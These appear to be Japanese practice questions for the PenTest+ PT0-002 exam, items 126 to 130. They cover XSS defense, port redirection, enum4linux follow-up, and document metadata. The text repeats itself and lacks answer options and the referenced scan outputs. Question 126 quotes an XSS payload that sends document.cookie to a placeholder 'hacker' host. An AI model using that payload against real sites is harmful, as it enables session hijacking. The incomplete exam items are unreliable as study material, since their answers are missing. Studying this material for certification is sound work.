PT0-002 試験問題 126
次のコードがあるとします:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
このタイプの攻撃を防ぐための最良の方法はどれですか? (2 つ選択してください。)
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
このタイプの攻撃を防ぐための最良の方法はどれですか? (2 つ選択してください。)
PT0-002 試験問題 127
侵入テスターはターゲットに対して Nmap スキャンを実行し、次の結果を受け取ります。

ターゲット上の TCP ポート 1080 を使用してスキャン ツールをリダイレクトするには、テスターは次のどれを使用する必要がありますか?

ターゲット上の TCP ポート 1080 を使用してスキャン ツールをリダイレクトするには、テスターは次のどれを使用する必要がありますか?
PT0-002 試験問題 128
侵入テスターは、侵害された Web サーバーから Java アプリケーション ファイルをダウンロードし、次のログを調べてその起動方法を特定します。

Java アプリケーションがソケット経由の暗号化を使用しているかどうかを検証するために、侵入テスターが従う必要がある手順の順序は次のどれですか。

Java アプリケーションがソケット経由の暗号化を使用しているかどうかを検証するために、侵入テスターが従う必要がある手順の順序は次のどれですか。
PT0-002 試験問題 129
enum4linux.pl コマンドを実行した後、侵入テスターは次の出力を受け取りました。
侵入テスターが次に実行する必要があるコマンドはどれですか?
侵入テスターが次に実行する必要があるコマンドはどれですか?
PT0-002 試験問題 130
侵入テスターは、特定のドメインの Web 上で利用可能なドキュメント内の隠された情報を見つけたいと考えています。侵入テスターは次のどれを使用する必要がありますか?
